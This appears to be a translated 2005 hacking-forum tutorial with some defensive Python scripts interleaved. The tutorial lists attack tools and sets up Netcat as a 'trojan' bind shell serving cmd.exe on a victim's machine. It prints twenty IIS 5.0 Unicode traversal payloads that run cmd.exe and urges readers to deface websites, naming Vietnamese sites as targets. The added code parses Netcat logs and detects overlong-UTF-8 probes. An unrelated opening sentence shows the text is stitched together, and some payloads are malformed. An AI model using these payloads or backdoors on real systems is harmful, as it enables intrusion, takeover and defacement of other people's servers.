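`readline(limit)` returns at most `limit` bytes, so the oversized line is never assembled in memory; the server sees 512 bytes without a terminator and closes the session while the remaining 64 KB are still unread on the socket.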
The most basic things to know to become a Hacker - Part 8 [2/17/2005 9:14:00 AM]

47.) The tools you need to hack the Web :

Professional hackers have no need for these tools: they set up on their own machine the very version the victim website runs and test it for bugs directly. But for those of you new to the trade these tools are essential; use them a few times and you will learn how to combine them so that finding the bugs on a victim website goes as fast as possible. Here are some tools you need to have on your working machine :

_ Tool 1 : A proxy, used to hide your IP and to get past firewalls when needed ( I showed how to set up a proxy in part 7, go back and read it ) .
_ Tool 2 : You need a shell account; this really matters for you. A good shell account is one that lets you run the main programs such as nslookup, host, dig, ping, traceroute, telnet, ssh, ftp,... and it must have GCC installed ( very important for compiling the exploits written in C ) as well as MinGW, Cygwin and other dev tools.
A shell account is rather like the DOS shell, but it has many more commands and functions than DOS. Normally when you install Unix you get a shell account; if you do not install Unix, you should register a free shell account online, or if someone installs Unix and sets up a shell account for you, you can log in through telnet (Start -> Run -> type Telnet) to use it. Here are a few addresses where you can register a free shell account :
http://www.freedomshell.com/
http://www.cyberspace.org/shell.html
http://www.ultrashell.net/
_ Tool 3 : NMAP is a very fast and powerful scanner. It can scan across a wide network and is especially good against a single host. NMAP lets you see which services are running on a server (services / ports : webserver, ftpserver, pop3,...), which operating system the server runs, the kind of firewall it uses,... and much more. In short NMAP supports most scanning techniques: ICMP (ping sweep), IP protocol, Null scan, TCP SYN (half open),... NMAP is rated the number one tool of hackers and network administrators alike around the world.
For everything about NMAP see http://www.insecure.org/ .
_ Tool 4 : Stealth HTTP Security Scanner is an excellent security vulnerability scanner for Win32. It can scan for more than 13000 security vulnerabilities and identify 5000 other exploits.
_ Tool 5 : IntelliTamper is a tool that shows the structure of a website, which directories and files it has, and it can even list directories and files that are password-protected. Very handy for hacking a website, because before you hack a website you need to gather some information about the Admin and the site .
_ Tool 6 : Netcat is a tool for reading and writing data across the network over TCP or UDP. You can use Netcat directly or drive it from another script. Netcat is regarded as an exploitation tool because it can set up a link between you and the server for reading and writing data ( once Netcat has been installed on a vulnerable server, of course ). For everything about Netcat see http://www.l0pht.com/ .
_ Tool 7 : ActivePerl is the tool for running Perl files with the *.pl extension, and exploits are often written in Perl. It is also used to run commands through *.pl files .
_ Tool 8 : Linux is the operating system almost all hackers use.
_ Tool 9 : L0phtCrack is the number one tool for cracking Windows NT/2000 passwords .
_ I have already shown how to download, so I will not repeat it here; when you download, pay attention to the versions: download and use the one with the highest version number, because it will have features the earlier versions lack. If you download a tool and do not know how to use it, look for the older posts with instructions in the relevant forum box. If you still cannot find any, just post a question and the members will answer you .

48 . ) Netcat user guide :

a . ) Introduction : Netcat is a tool you cannot do without if you want to hack a website, because it is very powerful and handy. So you need to know a little about Netcat.
b . ) Compiling :
_ With the Linux version of Netcat you have to compile it before use.
- edit the file netcat.c with vi: vi netcat.c
+ find the line res_init(); in main() and put two "/" in front of it: // res_init();
+ add the following 2 lines to the #define section (at the top of the file):

#define GAPING_SECURITY_HOLE
#define TELNET

- compile: make linux
- test run: ./nc -h
- if you want to run Netcat as nc instead of ./nc, just edit the PATH environment variable in the file ~/.bashrc and append ":."
PATH=/sbin:/usr/sbin:...:.
_ The Windows version of Netcat needs no compiling because the binary nc.exe is already there. Just unpack it and run it.
c . ) Netcat's options :
_ Netcat runs from the command line. Run nc -h to see the parameters:

CODE
C:\> nc -h
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d ----------- detach Netcat from the command window or console; Netcat runs in stealth mode (not shown on the Taskbar)
-e prog ------ execute the program prog, usually used in listen mode
-h ----------- print the help
-i secs ------ wait secs milliseconds before sending each line of data
-l ----------- put Netcat in listen mode to wait for incoming connections
-L ----------- force Netcat to "keep" listening. It listens again every time a connection is closed.
-n ----------- use numeric IP addresses only, such as 192.168.16.7; Netcat will not query DNS
-o file ------ write a log to file
-p port ------ specify the port number
-r ----------- ask Netcat to pick ports at random
-s addr ------ spoof the source IP address as addr
-t ----------- do not send extra information in a telnet session. When you telnet to a telnet daemon (telnetd), telnetd usually asks your telnet client to send extra information such as the TERM and USER environment variables. If you use netcat with the -t option to telnet, netcat will not send that information to telnetd.
-u ----------- use UDP (netcat uses TCP by default)
-v ----------- show details about the current connection.
-vv ---------- show even more detail.
-w secs ------ set the timeout for each connection to secs milliseconds
-z ----------- zero-I/O mode, usually used when scanning ports


Netcat supports port number ranges. The syntax is port1-port2. For example: 1-8080 means 1,2,3,...,8080

d . ) Learning Netcat through examples :

_ Grabbing a web server's banner :

Example: nc to 172.16.84.2, port 80

CODE
C:\> nc 172.16.84.2 80
HEAD / HTTP/1.0 (press Enter twice here)
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2000 20:51:37 GMT
Server: Apache-AdvancedExtranetServer/1.3.19 (Linux-Mandrake/3mdk) mod_ssl/2.8.2
OpenSSL/0.9.6 PHP/4.0.4pl1
Connection: close
Content-Type: text/html


To see detailed information about the connection you can use -v ( -vv gives even more detail )

C:\> nc -vv 172.16.84.1 80

CODE
172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [172.16.84.1] 80 (?) open
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Fri, 04 Feb 2000 14:46:43 GMT
Server: Apache/1.3.20 (Win32)
Last-Modified: Thu, 03 Feb 2000 20:54:02 GMT
ETag: "0-cec-3899eaea"
Accept-Ranges: bytes
Content-Length: 3308
Connection: close
Content-Type: text/html
sent 17, rcvd 245: NOTSOCK


If you want to keep a log, use -o . For example:

nc -vv -o nhat_ki.log 172.16.84.2 80

open the file nhat_ki.log and see what it recorded :

CODE
< 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK.
< 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04 F
< 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54
< 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 # GMT..Server: Ap
< 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win
< 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32)..Last-Modifi
< 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb
< 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM
< 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T..ETag: "0-cec-
< 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea"..Accep
< 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes.
< 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length:
< 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f # 3308..Connectio
< 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close..Conten
< 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm
< 000000f0 6c 0d 0a 0d 0a # l....


the < sign means the server sent this to netcat
the > sign means netcat sent this to the server
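
The -o log format above is also a convenient evidence format: the direction marker, the offset and the hex bytes are enough to rebuild exactly what each side sent. The script below is an added example, not from the article or from Netcat, that parses such a log back into the two byte streams and then pulls the status line and Server header out of the response, which is the whole point of the banner grab in the first example. The log text is constructed from the server lines shown above plus an assumed record of the 17-byte request; the parser refuses logs whose offsets do not line up rather than guessing.

```python
# Constructed from the `nc -o` log shown above: the 245 response bytes the
# server sent ('<') plus an assumed record of the 17-byte request ('>').
SAMPLE_NC_LOG = """\
> 00000000 48 45 41 44 20 2f 20 48 54 54 50 2f 31 2e 30 0a # HEAD / HTTP/1.0.
> 00000010 0a                                              # .
< 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK.
< 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04 F
< 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54
< 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 # GMT..Server: Ap
< 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win
< 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32)..Last-Modifi
< 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb
< 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM
< 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T..ETag: "0-cec-
< 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea"..Accep
< 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes.
< 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length:
< 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f # 3308..Connectio
< 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close..Conten
< 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm
< 000000f0 6c 0d 0a 0d 0a                                  # l....
"""


def parse_nc_log(text):
    """Reassemble the bytes each side sent from an `nc -o` hex log.

    Lines start with '>' (netcat -> server) or '<' (server -> netcat), then a
    hex offset, the hex bytes, and after ' # ' the printable rendering, which
    is ignored. Returns (sent, received). Offsets are checked so a truncated
    or reordered log raises instead of silently producing garbage.
    """
    streams = {">": bytearray(), "<": bytearray()}
    expected = {">": 0, "<": 0}
    for line in text.splitlines():
        if not line or line[0] not in streams:
            continue
        left, _, _printable = line.partition(" # ")
        tokens = left.split()
        direction, offset = tokens[0], int(tokens[1], 16)
        if offset != expected[direction]:
            raise ValueError("offset %#x for %r, expected %#x"
                             % (offset, direction, expected[direction]))
        chunk = bytes.fromhex("".join(tokens[2:]))
        streams[direction] += chunk
        expected[direction] += len(chunk)
    return bytes(streams[">"]), bytes(streams["<"])


def parse_http_response(raw):
    """Split a raw HTTP response into (status line, headers dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = {}
    for field in lines[1:]:
        name, _, value = field.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def banner_from_log(text):
    """What the banner grab tells you: the status line and the Server header."""
    _sent, received = parse_nc_log(text)
    status, headers, _body = parse_http_response(received)
    return status, headers.get("server")


if __name__ == "__main__":
    print(banner_from_log(SAMPLE_NC_LOG))
```

Header names are lower-cased because HTTP header names are case-insensitive; the body is returned separately so a response that carries content after the blank line (a GET instead of a HEAD) is handled the same way.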

_ Port scanning :
Run netcat with the -z option. But to scan ports faster, use -n so that netcat does not need to query DNS. Example: scan the TCP ports (1 to 500) of host 172.16.106.1

CODE
[dt@vicki /]# nc -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 443 (?) open
(UNKNOWN) [172.16.106.1] 139 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open
(UNKNOWN) [172.16.106.1] 80 (?) open
(UNKNOWN) [172.16.106.1] 23 (?) open


if you need to scan UDP ports, use -u

CODE
[dt@vicki /]# nc -u -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 1025 (?) open
(UNKNOWN) [172.16.106.1] 1024 (?) open
(UNKNOWN) [172.16.106.1] 138 (?) open
(UNKNOWN) [172.16.106.1] 137 (?) open
(UNKNOWN) [172.16.106.1] 123 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open


_ Turning Netcat into a trojan :
On the victim's computer you start netcat in listen mode with the -l ( listen ) option and -p port to set the port number to listen on; -e asks netcat to execute a program when a connection comes in, usually a command shell: cmd.exe ( on NT ) or /bin/sh ( on Unix ). For example:

CODE
E:\> nc -nvv -l -p 8080 -e cmd.exe
listening on [any] 8080 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159
sent 0, rcvd 0: unknown socket error


On the attacking computer you just use netcat to connect to the victim's machine on the chosen port, for example 8080

CODE
C:\> nc -nvv 172.16.84.2 8080
(UNKNOWN) [172.16.84.2] 8080 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
E:\> cd test
cd test
E:\test> dir /w
dir /w
Volume in drive E has no label.
Volume Serial Number is B465-452F
Directory of E:\test
[.] [..] head.log NETUSERS.EXE NetView.exe
ntcrash.zip password.txt pwdump.exe
6 File(s) 262,499 bytes
2 Dir(s) 191,488,000 bytes free
C:\test> exit
exit
sent 20, rcvd 450: NOTSOCK


As you can see, we can now do whatever we like on the victim's machine; with just a few basic commands we have taken over the other side's computer. Read on:

CODE
E:\> nc -nvv -L -p 8080 -e cmd.exe
listening on [any] 8080 ...


With the Windows version of Netcat in particular, you can listen on a port that is already listening. Just specify the source address with -s <this_machine's_ip_address> . For example:

CODE
netstat -a
...
TCP nan_nhan:domain nan_nhan:0 LISTENING <- port 53 is listening
...
E:\> nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53 -> listen directly on port 53
listening on [172.16.84.1] 53 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163


On Windows NT you do not need Administrator rights to put Netcat in listen mode; just log in with an ordinary username and start Netcat. Note: you cannot run netcat with ... -u -e cmd.exe ... or ... -u -e /bin/sh ... because netcat will not work correctly. If you want a UDP shell on Unix, use udpshell instead of netcat.

( Based on the article by brother Vicky )

49 . ) Technique for hacking IIS server 5.0 :

_ IIS server versions up to and including 5.0 all have a bug we can exploit; since nearly everyone now uses IIS server 5.0, I will not cover the bugs of the earlier versions. Now I will show you how to hack using the ActivePerl tool and IE; you can apply it to Vietnamese websites because a great many of them have this bug. Let's begin.
_ First download ActivePerl and Unicode.pl .
_ Use telnet to find out whether the website we are attacking runs IIS server 5.0 :

CODE
telnet < website name > 80
HEAD / HTTP/1.0


If it does not tell us which program the target is running, replace port 80 with other ports such as 8080, 81, 8000, 8001 etc.
_ Once the target is identified, go to DOS and type :

CODE
perl unicode.pl
Host: ( type the address of the server you want to hack )
Port: 80 ( or 8080, 81, 8000, 8001, depending on the port we telnetted to earlier ) .


_ You will see the list of bugs ( programmed into Unicode.pl ) like this :

CODE
[1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+
[2] /scripts..%c1%9c../winnt/system32/cmd.exe?/c+
[3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+
[4] /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+
[5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+
[6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+
[7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+
[8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+
[9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+
[10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+
[11] /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+
[12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+
[13] /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+
[14] /msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe?/c+
[15] /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[16] /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[17] /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[18] /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[19] /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[20] /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+


You will see all the bugs above if the victim's website has every one of them; if the victim's server only has bugs 13 and 17, only lines 13 and 17 appear in the result table.
Say, for example, the result table tells me the victim's website has bugs 3 and 7; I open IE and enter the corresponding string in the Address bar :

http://www.xxx.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+ <== bug on line 3
or
http://www.xxx.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+ <== bug on line 7

At this point you are inside the victim's server; use DOS commands to dig out the information in there. Websites usually live in the directory \inetpub\wwwroot; once you are in, just replace index.html with your own hack page. That's it, don't wreck anything.
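
What makes the request forms listed above work is a decoder that accepts overlong UTF-8: %c0%af is a two-byte encoding of the one-byte character "/" and %c1%9c of "\", so the path check sees no ".." traversal while the file system does. The script below is an added example, not from the article or from Unicode.pl, for the other side of the fence: it decodes request URIs the lenient way, counts how many multi-byte sequences collapsed to ASCII, and flags web-log lines (a constructed client/method/URI/status format) that show overlong encoding, traversal after decoding, or a request for cmd.exe. The invalid escapes in the list above (%pc and the like) never decode and are caught only by the third rule, which the last sample line shows.

```python
from urllib.parse import unquote_to_bytes

# Leading-byte patterns of 2- to 6-byte UTF-8 forms. The 5- and 6-byte forms
# were part of the original UTF-8 definition and decoders of that era took them.
UTF8_LEADS = ((0xE0, 0xC0, 2), (0xF0, 0xE0, 3), (0xF8, 0xF0, 4),
              (0xFC, 0xF8, 5), (0xFE, 0xFC, 6))


def lenient_utf8(data):
    """Decode bytes the way a buggy decoder does: overlong forms are accepted.

    Returns (text, overlong_count). overlong_count is the number of multi-byte
    sequences that decoded to an ASCII character, which a correct decoder rejects.
    """
    out, overlong, i = [], 0, 0
    while i < len(data):
        c = data[i]
        length = next((n for mask, lead, n in UTF8_LEADS if c & mask == lead), 1)
        seq = data[i:i + length]
        if length == 1 or len(seq) < length or any(x & 0xC0 != 0x80 for x in seq[1:]):
            out.append(chr(c) if c < 0x80 else "\ufffd")   # plain ASCII or junk byte
            i += 1
            continue
        cp = c & (0xFF >> (length + 1))                   # payload bits of the lead byte
        for x in seq[1:]:
            cp = (cp << 6) | (x & 0x3F)
        if cp < 0x80:
            overlong += 1                                  # ASCII hidden in a long form
        out.append(chr(cp) if cp <= 0x10FFFF else "\ufffd")
        i += length
    return "".join(out), overlong


def analyse_uri(uri):
    """Decode a request URI as the vulnerable server would and list what it reveals."""
    text, overlong = lenient_utf8(unquote_to_bytes(uri))
    normalised = text.replace("\\", "/").lower()
    findings = []
    if overlong:
        findings.append("overlong-utf8")
    if "/../" in normalised:
        findings.append("traversal")
    if "cmd.exe" in normalised:
        findings.append("cmd-interpreter")
    return normalised, findings


# Constructed log lines (client method uri status) reusing request forms from
# the list above; the last one carries an invalid escape (%pc) that never decodes.
SAMPLE_LOG = """\
203.0.113.9 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 200
203.0.113.9 GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir 200
203.0.113.9 GET /msadc/..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir 404
198.51.100.4 GET /index.html 200
198.51.100.4 GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir 400
"""


def scan_log(text):
    """Return one record per request that shows any of the three indicators."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        client, method, uri, status = line.split()
        normalised, findings = analyse_uri(uri)
        if findings:
            hits.append({"client": client, "method": method, "uri": uri,
                         "decoded": normalised, "status": int(status),
                         "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["client"], hit["status"], hit["decoded"], hit["findings"])
```

The 404 on the third line is worth keeping in the alert: a probe that fails still tells you who is probing, and the decoded column shows what path the server would actually have resolved.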

GOOD LUCK!!!!!!!!!!!!!!!
